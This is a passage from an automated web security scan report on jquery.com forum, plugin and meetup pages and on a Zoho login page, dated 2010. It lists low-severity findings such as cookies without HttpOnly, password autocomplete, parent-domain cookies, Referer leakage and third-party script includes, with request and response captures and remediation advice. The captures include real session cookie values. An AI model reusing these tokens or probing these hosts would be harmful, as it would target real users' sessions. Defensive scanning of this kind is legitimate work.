Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 500 POST_ONLY_URL
Set-Cookie: JSESSIONID=DD4C43763F4EDFA92007DB02C656454B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Tue, 16 Nov 2010 02:34:38 GMT
Server: Apache-Coyote/1.1
Connection: close

<link href="/styles/errorpage.css" rel="stylesheet" type="text/css"/>

<title>Requested url not found</title>
<div class="errorpagemain">
<div class="headerArea">
<div class="headerAre
...[SNIP]...

2.22. http://forum.jquery.com/user/andrew_powell previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.jquery.com
Path:	/user/andrew_powell

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=16C254095C2124D65EE64E94307DBCA0; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

2.23. http://forum.jquery.com/user/charlietfl previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.jquery.com
Path:	/user/charlietfl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=59CEF57F096606606E0C367A9D77EDCB; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

2.24. http://forum.jquery.com/user/christophe previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.jquery.com
Path:	/user/christophe

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=DA6C6F3D4597C88D4576CA4F90C364C0; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

2.25. http://forum.jquery.com/user/jeresig previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.jquery.com
Path:	/user/jeresig

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=6B51C808310C43BC59A7FCE896A79140; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

2.26. http://forum.jquery.com/user/kbwood.au previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.jquery.com
Path:	/user/kbwood.au

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=E6A0387222674E9994B5F79EBEB4FA46; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

2.27. http://forum.jquery.com/user/scottjehl previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.jquery.com
Path:	/user/scottjehl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=05CE8F1E0AE7F496B5A09850FA785AAB; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

2.28. http://forum.jquery.com/user/wycats previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.jquery.com
Path:	/user/wycats

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=25EEAA759D352A30C3AA8E23615DFCFD; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

2.29. http://forum.jquery.com/using-jquery-plugins/feed previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.jquery.com
Path:	/using-jquery-plugins/feed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=656CB96EFB1268601BCC17736BCADF27; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /using-jquery-plugins/feed HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=656CB96EFB1268601BCC17736BCADF27; Path=/
Content-Type: Text/Xml;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:50 GMT
Server: Apache-Coyote/1.1
Connection: close

<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:atom="http://www.w3.org/2005/Atom">

   <channel>
       <title>jQuery Forum</title>
       <atom:link href="http://forum.jquery.com/F
...[SNIP]...

2.30. http://forum.jquery.com/using-jquery-ui/feed previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.jquery.com
Path:	/using-jquery-ui/feed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=4244A6E803BA3D6EA8278E71FD90AB63; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /using-jquery-ui/feed HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=4244A6E803BA3D6EA8278E71FD90AB63; Path=/
Content-Type: Text/Xml;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:52 GMT
Server: Apache-Coyote/1.1
Connection: close

<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:atom="http://www.w3.org/2005/Atom">

   <channel>
       <title>jQuery Forum</title>
       <atom:link href="http://forum.jquery.com/F
...[SNIP]...

2.31. http://forum.jquery.com/using-jquery/feed previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://forum.jquery.com
Path:	/using-jquery/feed

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=CC781A595F319E0A674E2113A1D61AE2; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /using-jquery/feed HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=CC781A595F319E0A674E2113A1D61AE2; Path=/
Content-Type: Text/Xml;charset=UTF-8
Date: Tue, 16 Nov 2010 02:30:47 GMT
Server: Apache-Coyote/1.1
Connection: close

<rss version="2.0"
    xmlns:dc="http://purl.org/dc/elements/1.1/"
    xmlns:atom="http://www.w3.org/2005/Atom">

   <channel>
       <title>jQuery Forum</title>
       <atom:link href="http://forum.jquery.com/F
...[SNIP]...

2.32. http://meetups.jquery.com/main/badge/showPlayerConfig previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://meetups.jquery.com
Path:	/main/badge/showPlayerConfig

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ning_session=BzbOI0j3N7lS4V6sU0Z9jK1F3TxbRWd8yLQYUdc+btemQp7Pvi1QiTGrH9lOpNzLmjJZnm/7W7g=;Path=/;Domain=meetups.jquery.com;Expires=Tue, 16-Nov-10 03:34:44 GMT

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /main/badge/showPlayerConfig HTTP/1.1
Host: meetups.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2__utmv=^ning.1289873039410:; ning_session=BzbOI0j3N7lS4V6sU0Z9jK1F3TxbRWd8yLQYUdc+btemQp7Pvi1QiVOzqZFnXyKiRkA7rmCbvfA=; 2__utmz=^ning.1305641039411:52481588.1289873039.1.1.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmz=52481588.1289873049.1.1.utmcsr=jquery.com|utmccn=(referral)|utmcmd=referral|utmcct=/; xn_visitor=dfa88738-8fee-489d-b673-67c5b27bed56; __utma=52481588.1320023348.1289873049.1289873049.1289873049.1; 2__utma=^ning.1352945039411:52481588.1359910525.1289873039.1289873039.1289873039.1; __utmc=52481588; __utmb=52481588.1.10.1289873049; 2__utmc=^ning.1352945039411:52481588; 2__utmb=^ning.1289874839505:52481588.1.10.1289873039;

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 02:34:44 GMT
Server: Jetty/5.1.15 (SunOS/5.10 x86 java/1.6.0_03
Connection: close
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ning_session=BzbOI0j3N7lS4V6sU0Z9jK1F3TxbRWd8yLQYUdc+btemQp7Pvi1QiTGrH9lOpNzLmjJZnm/7W7g=;Path=/;Domain=meetups.jquery.com;Expires=Tue, 16-Nov-10 03:34:44 GMT
X-XN-Trace-Token: 7d4a3f78-dcef-401c-896a-312e4068d9c9
X-XN-XNHTML: false
Date: Tue, 16 Nov 2010 02:34:43 GMT
Date: Tue, 16 Nov 2010 02:34:43 GMT
Vary: X-XN_APPLICATION
P3P: CP="UNI STA LOC CURa OURa COR ALL IND"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Last-Modified: Tue, 16 Nov 2010 02:34:44 UTC
Content-Type: text/xml;charset=utf-8
Server: Ning HTTP Server 2.0
Pragma:
Cache-Control: max-age=300
Cache-Control: no-cache="Set-Cookie"
Content-Length: 1883

<?xml version="1.0" encoding="UTF-8" ?>
<config>
<flags>
<showJoin>1</showJoin>
</flags>
<urls>
<image>http://api.ning.com/icons/appatar/4919002?default=-1&width=48&height=48</i
...[SNIP]...

2.33. http://plugins.jquery.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://plugins.jquery.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESSabdcf03bfc020aa07e9f024d8c52c72f=p1ng5nbihhtpishtt6797ga453; expires=Thu, 09 Dec 2010 05:56:57 GMT; path=/; domain=.plugins.jquery.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://jquery.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: plugins.jquery.com
Proxy-Connection: Keep-Alive
Cookie: __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmb=44433727.2.10.1289872970; __utmc=44433727; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 16 Nov 2010 02:23:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: SESSabdcf03bfc020aa07e9f024d8c52c72f=p1ng5nbihhtpishtt6797ga453; expires=Thu, 09 Dec 2010 05:56:57 GMT; path=/; domain=.plugins.jquery.com
Last-Modified: Tue, 16 Nov 2010 02:19:40 GMT
ETag: "c60313504b62203a5c053249b5160807"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-
...[SNIP]...

2.34. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=1cd27b1a-204.0.5.41-1289161421; expires=Thu, 15-Nov-2012 02:34:42 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b HTTP/1.1
Host: b.scorecardresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UID=1cd27b1a-204.0.5.41-1289161421;

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 16 Nov 2010 02:34:42 GMT
Connection: close
Set-Cookie: UID=1cd27b1a-204.0.5.41-1289161421; expires=Thu, 15-Nov-2012 02:34:42 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

3. Password field with autocomplete enabled previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://accounts.zoho.com
Path:	/login

Issue detail

The page contains a form with the following action URL:

https://accounts.zoho.com/login

The form contains the following password field with autocomplete enabled:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Request

Response

HTTP/1.1 200 OK
P3P: CP="CAO PSA OUR"
Set-Cookie: IAMAGENTTICKET=; Domain=.zoho.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Set-Cookie: IAMAGENTTICKET=; Domain=.zoho.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:34:41 GMT
Connection: close
Server: ZWS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">

<html>
<head>
<title>Zoho Accounts</title>
<style type="text
...[SNIP]...
<div id="loginform">
<form name=login id=login onsubmit="javascript:return submitlogin(this);" method="post">
<table cellspacing="0" cellpadding="0" align="center">
...[SNIP]...
<td align="left"><input type=password name=pwd class="input" onkeypress="clearmsg()"></td>
...[SNIP]...

4. Cookie scoped to parent domain previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=1cd27b1a-204.0.5.41-1289161421; expires=Thu, 15-Nov-2012 02:34:42 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

Request

Response

5. Cross-domain Referer leakage previous next
There are 2 instances of this issue:

http://forum.jquery.com/subscribeRegister.do
http://go.microsoft.com/fwlink/

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

5.1. http://forum.jquery.com/subscribeRegister.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/subscribeRegister.do

Issue detail

The page was loaded from a URL containing a query string:

http://forum.jquery.com/subscribeRegister.do?serviceurl=%2Fjquery%3Freferrer%3DsignUp%26forumGroupId%3D14737000000003003&referrer=signUp&forumGroupId=14737000000003003

The response contains the following links to other domains:

http://blogs.zoho.com/
http://discussions.zoho.com/home
http://forums.zoho.com/zoho-discussions
http://js.zohostatic.com/discussions/v6/js/jquery-1.3.1.min.js
http://www.zoho.com/
http://www.zoho.com/company.html
http://www.zoho.com/contact.html
http://www.zoho.com/discussions/images/zohoLogo-ht21.png
https://accounts.zoho.com/register?service_language=default&servicename=ZohoDiscussions&serviceurl=http%3A%2F%2Fdiscussions.zoho.com%2Fjquery%3Freferrer%3DsignUp%26forumGroupId%3D14737000000003003&showheader=false&showGoogleYahoo=false&css=http://discussions.zoho.com/styles/iamregister.css

Request

GET /subscribeRegister.do?serviceurl=%2Fjquery%3Freferrer%3DsignUp%26forumGroupId%3D14737000000003003&referrer=signUp&forumGroupId=14737000000003003 HTTP/1.1
Host: forum.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=AD357A14E7FC954350E517D74E9E548F; __utmz=44433727.1289872970.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=44433727.2099880684.1289872970.1289872970.1289872970.1; __utmc=44433727; __utmb=44433727.3.10.1289872970; zdccn=62213a1a-db44-432f-a0e7-c5eb57ba4dbb;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=AB288D1FDFBEFEC561E9A4E52A70F5E1; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:34:40 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equi
...[SNIP]...
<link href="/getCustomFile.do?fileId=14737000000667636&forumGroupId=14737000000003003" type="text/css" rel="stylesheet">

<script src = "http://js.zohostatic.com/discussions/v6/js/jquery-1.3.1.min.js" type = "text/javascript" language = "javascript"></script>
...[SNIP]...
<div class="subMenu normalText">
<a href="http://www.zoho.com/">Zoho Home</a>
<a href="http://blogs.zoho.com">Blogs</a>
<a href="http://forums.zoho.com/zoho-discussions">Forums</a>
<a href="http://www.zoho.com/company.html">About Us</a>
<a href="http://www.zoho.com/contact.html">Contact Us</a>
...[SNIP]...
</div>

<iframe frameborder="0" width="700" height="500" scrolling="no" src="https://accounts.zoho.com/register?service_language=default&servicename=ZohoDiscussions&serviceurl=http%3A%2F%2Fdiscussions.zoho.com%2Fjquery%3Freferrer%3DsignUp%26forumGroupId%3D14737000000003003&showheader=false&showGoogleYahoo=false&css=http://discussions.zoho.com/styles/iamregister.css"></iframe>
...[SNIP]...
<p id="jq-hosting">Sponsored by <a href="http://discussions.zoho.com/home" target="_blank"><img style="vertical-align:middle" src="http://www.zoho.com/discussions/images/zohoLogo-ht21.png" border="0" /></a>
...[SNIP]...

5.2. http://go.microsoft.com/fwlink/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://go.microsoft.com
Path:	/fwlink/

Issue detail

The page was loaded from a URL containing a query string:

http://go.microsoft.com/fwlink/?LinkId=44406

The response contains the following link to another domain:

http://rss.msnbc.msn.com/id/3032091/device/rss/rss.xml

Request

GET /fwlink/?LinkId=44406 HTTP/1.1
Accept: */*
If-Modified-Since: Mon, 15 Nov 2010 01:20:33 GMT
If-None-Match: "e5f0-4950d3f1fba40"
A-IM: feed
Accept-Language: en-US
User-Agent: Windows-RSS-Platform/2.0 (MSIE 8.0; Windows NT 6.1)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: go.microsoft.com
Pragma: no-cache
Cookie: A=I&I=AxUFAAAAAACMBwAAy3eITXpGsXEo3SGfnFhbmg!!

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 171
Content-Type: text/html; charset=utf-8
Expires: Tue, 16 Nov 2010 02:31:27 GMT
Location: http://rss.msnbc.msn.com/id/3032091/device/rss/rss.xml
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 02:32:27 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://rss.msnbc.msn.com/id/3032091/device/rss/rss.xml">here</a>.</h2>
</body></html>

6. Cross-domain script include previous next
There are 20 instances of this issue:

http://forum.jquery.com/about-the-jquery-forum
http://forum.jquery.com/developing-jquery-mobile
http://forum.jquery.com/developing-jquery-plugins
http://forum.jquery.com/jquery-conferences
http://forum.jquery.com/jquery-mobile
http://forum.jquery.com/qunit-and-testing
http://forum.jquery.com/subscribeRegister.do
http://forum.jquery.com/topic/how-can-i-help-9-5-2010
http://forum.jquery.com/topic/looking-for-help-on-panel-development
http://forum.jquery.com/user/andrew_powell
http://forum.jquery.com/user/charlietfl
http://forum.jquery.com/user/christophe
http://forum.jquery.com/user/escape164
http://forum.jquery.com/user/jeresig
http://forum.jquery.com/user/joern.zaefferer
http://forum.jquery.com/user/kbwood.au
http://forum.jquery.com/user/malsup
http://forum.jquery.com/user/scottjehl
http://forum.jquery.com/user/wycats
http://osvdb.org/

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

6.1. http://forum.jquery.com/about-the-jquery-forum previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/about-the-jquery-forum

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.zohostatic.com/discussions/v7/js/zdjquery.js
http://js.zohostatic.com/discussions/v7/js/ze_init.js
http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=5B7FED8F2238C535DF4F28A8A27FB530; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:32:27 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.2. http://forum.jquery.com/developing-jquery-mobile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/developing-jquery-mobile

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.zohostatic.com/discussions/v7/js/zdjquery.js
http://js.zohostatic.com/discussions/v7/js/ze_init.js
http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=BE61E18B27FEA85612DE309D854DEEBD; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:34:07 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.3. http://forum.jquery.com/developing-jquery-plugins previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/developing-jquery-plugins

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.zohostatic.com/discussions/v7/js/zdjquery.js
http://js.zohostatic.com/discussions/v7/js/ze_init.js
http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=31A3A3697572135978EA43A4B3445CA3; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:31:26 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js"></script>
...[SNIP]...

6.4. http://forum.jquery.com/jquery-conferences previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forum.jquery.com
Path:	/jquery-conferences

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.zohostatic.com/discussions/v7/js/zdjquery.js
http://js.zohostatic.com/discussions/v7/js/ze_init.js
http://js.zohostatic.com/discussions/v7/js/zohodiscussions.js

Request

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=E9EAA61A3D158993FEA0827C700963BF; Path=/
Content-Type: text/html;charset=UTF-8
Date: Tue, 16 Nov 2010 02:32:54 GMT
Server: Apache-Coyote/1.1
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="SH
...[SNIP]...
<link href="http://css.zohostatic.com/discussions/v7/css/lightbox.css" type="text/css" rel="stylesheet" />
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/zdjquery.js"></script>
<script type="text/javascript" src="http://js.zohostatic.com/discussions/v7/js/ze_init.js"></script>

